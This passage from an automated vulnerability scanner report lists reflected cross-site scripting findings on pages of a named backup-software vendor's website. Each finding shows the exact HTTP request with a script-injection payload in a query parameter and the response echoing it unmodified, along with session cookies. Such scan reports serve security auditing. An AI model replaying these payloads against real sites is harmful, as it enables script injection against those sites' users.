Cookie: PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmb=230392542.3.10.1289802285; __utmc=230392542; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); vhbsc=3vkq98e8n43m6gnh0u2qf9sff6

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 15:44:14 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 21774

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Online Backup Software - Vembu StoreGrid - Custom error page</title>
<meta h
...[SNIP]...
<input value="http://storegrid.vembu.com/404.php?62a4b"><script>alert(1)</script>f9712fdac3c=1" name="next-url" type="hidden">
...[SNIP]...

4.356. http://storegrid.vembu.com/online-backup/active-directory-backup.php [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/active-directory-backup.php

Issue detail

The value of the ct request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4afe4"><script>alert(1)</script>9c1801939c9 was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/active-directory-backup.php?ct=14afe4"><script>alert(1)</script>9c1801939c9 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:14:38 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 17015

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Active Directory / System State Backup | Vembu StoreGrid | Remote Backup sof
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/active-directory-backup.php?ct=14afe4"><script>alert(1)</script>9c1801939c9" name="next-url" type="hidden">
...[SNIP]...

4.357. http://storegrid.vembu.com/online-backup/active-directory-backup.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/active-directory-backup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fb2c"><script>alert(1)</script>6c0c7e06979 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/active-directory-backup.php?ct=1&8fb2c"><script>alert(1)</script>6c0c7e06979=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:14:54 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 23584

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Active Directory / System State Backup | Vembu StoreGrid | Remote Backup sof
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/active-directory-backup.php?ct=1&8fb2c"><script>alert(1)</script>6c0c7e06979=1" name="next-url" type="hidden">
...[SNIP]...

4.358. http://storegrid.vembu.com/online-backup/backup-alerts.php [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/backup-alerts.php

Issue detail

The value of the ct request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77bf2"><script>alert(1)</script>3cbf7902197 was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/backup-alerts.php?ct=177bf2"><script>alert(1)</script>3cbf7902197 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:10:13 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 17426

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Backup Alerts and Reports | Network Backup Software for MSPs, VARs, Service
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/backup-alerts.php?ct=177bf2"><script>alert(1)</script>3cbf7902197" name="next-url" type="hidden">
...[SNIP]...

4.359. http://storegrid.vembu.com/online-backup/backup-alerts.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/backup-alerts.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bfc0"><script>alert(1)</script>aea0658ee7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/backup-alerts.php?ct=1&6bfc0"><script>alert(1)</script>aea0658ee7e=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:10:13 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 23630

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Backup Alerts and Reports | Network Backup Software for MSPs, VARs, Service
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/backup-alerts.php?ct=1&6bfc0"><script>alert(1)</script>aea0658ee7e=1" name="next-url" type="hidden">
...[SNIP]...

4.360. http://storegrid.vembu.com/online-backup/backup-solutions.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/backup-solutions.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3077"><script>alert(1)</script>75e8398a025 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/backup-solutions.php?c3077"><script>alert(1)</script>75e8398a025=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 06:41:23 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 32273

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Backup Solutions for all your online / remote / onsite backup needs.</tit
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/backup-solutions.php?c3077"><script>alert(1)</script>75e8398a025=1" name="next-url" type="hidden">
...[SNIP]...

4.361. http://storegrid.vembu.com/online-backup/bare-metal-image-backup.php [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/bare-metal-image-backup.php

Issue detail

The value of the ct request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bee6c"><script>alert(1)</script>0ed7723ba69 was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/bare-metal-image-backup.php?ct=1bee6c"><script>alert(1)</script>0ed7723ba69 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:09:36 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 25565

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Bare Metal Disk Image Backup Plugin for Vembu StoreGrid Backup Software</tit
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/bare-metal-image-backup.php?ct=1bee6c"><script>alert(1)</script>0ed7723ba69" name="next-url" type="hidden">
...[SNIP]...

4.362. http://storegrid.vembu.com/online-backup/bare-metal-image-backup.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/bare-metal-image-backup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d898f"><script>alert(1)</script>b4347c6605e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/bare-metal-image-backup.php?d898f"><script>alert(1)</script>b4347c6605e=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 06:43:02 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 25563

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Bare Metal Disk Image Backup Plugin for Vembu StoreGrid Backup Software</tit
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/bare-metal-image-backup.php?d898f"><script>alert(1)</script>b4347c6605e=1" name="next-url" type="hidden">
...[SNIP]...

4.363. http://storegrid.vembu.com/online-backup/computer-backup.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/computer-backup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d403"><script>alert(1)</script>3ee46cd9f61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/computer-backup.php/9d403"><script>alert(1)</script>3ee46cd9f61 HTTP/1.1
Accept: */*
Referer: http://storegrid.vembu.com/online-backup/backup-software-pricing.php
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: storegrid.vembu.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmb=230392542.2.10.1289802285; __utmc=230392542; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); vhbsc=3vkq98e8n43m6gnh0u2qf9sff6

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 06:38:40 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 42073

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Computer Backup Software | Vembu StoreGrid Professional Edition Download<
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/computer-backup.php/9d403"><script>alert(1)</script>3ee46cd9f61" name="next-url" type="hidden">
...[SNIP]...

4.364. http://storegrid.vembu.com/online-backup/customer-management.php [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/customer-management.php

Issue detail

The value of the ct request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bd4f"><script>alert(1)</script>7122c3acf6b was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/customer-management.php?ct=13bd4f"><script>alert(1)</script>7122c3acf6b HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:09:17 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 16525

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Customer Group Centralized Management | Remote Backup Software | Vembu Store
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/customer-management.php?ct=13bd4f"><script>alert(1)</script>7122c3acf6b" name="next-url" type="hidden">
...[SNIP]...

4.365. http://storegrid.vembu.com/online-backup/customer-management.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/customer-management.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d654d"><script>alert(1)</script>ca9292de19d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/customer-management.php?d654d"><script>alert(1)</script>ca9292de19d=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 06:42:06 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 24373

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Customer Group Centralized Management | Remote Backup Software | Vembu Store
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/customer-management.php?d654d"><script>alert(1)</script>ca9292de19d=1" name="next-url" type="hidden">
...[SNIP]...

4.366. http://storegrid.vembu.com/online-backup/external-disk-backup.php [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/external-disk-backup.php

Issue detail

The value of the ct request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13ab5"><script>alert(1)</script>cd450621623 was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/external-disk-backup.php?ct=113ab5"><script>alert(1)</script>cd450621623 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:13:14 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 17495

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>External Disk Backup | Vembu StoreGrid | Flexible backup software for MSPs,
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/external-disk-backup.php?ct=113ab5"><script>alert(1)</script>cd450621623" name="next-url" type="hidden">
...[SNIP]...

4.367. http://storegrid.vembu.com/online-backup/external-disk-backup.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/external-disk-backup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acbce"><script>alert(1)</script>3112fe203f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/external-disk-backup.php?acbce"><script>alert(1)</script>3112fe203f9=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:12:18 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 23795

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>External Disk Backup | Vembu StoreGrid | Flexible backup software for MSPs,
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/external-disk-backup.php?acbce"><script>alert(1)</script>3112fe203f9=1" name="next-url" type="hidden">
...[SNIP]...

4.368. http://storegrid.vembu.com/online-backup/flexible-web-console-administration.php [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/flexible-web-console-administration.php

Issue detail

The value of the ct request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e31e"><script>alert(1)</script>43e68714a0f was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/flexible-web-console-administration.php?ct=16e31e"><script>alert(1)</script>43e68714a0f HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:10:13 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 16887

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Flexible Web Console Administration | Browser Based GUI | Vembu StoreGrid -
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/flexible-web-console-administration.php?ct=16e31e"><script>alert(1)</script>43e68714a0f" name="next-url" type="hidden">
...[SNIP]...

4.369. http://storegrid.vembu.com/online-backup/flexible-web-console-administration.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/flexible-web-console-administration.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4f64"><script>alert(1)</script>9bfafd4d69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/flexible-web-console-administration.php?e4f64"><script>alert(1)</script>9bfafd4d69=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 06:41:57 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 24271

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Flexible Web Console Administration | Browser Based GUI | Vembu StoreGrid -
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/flexible-web-console-administration.php?e4f64"><script>alert(1)</script>9bfafd4d69=1" name="next-url" type="hidden">
...[SNIP]...

4.370. http://storegrid.vembu.com/online-backup/ms-exchange-backup.php [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/ms-exchange-backup.php

Issue detail

The value of the ct request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67781"><script>alert(1)</script>4158fd060b2 was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/ms-exchange-backup.php?ct=167781"><script>alert(1)</script>4158fd060b2 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:13:51 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 19843

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>MS Exchange Backup | Vembu StoreGrid | Mailbox Backup Software for MSPs, VAR
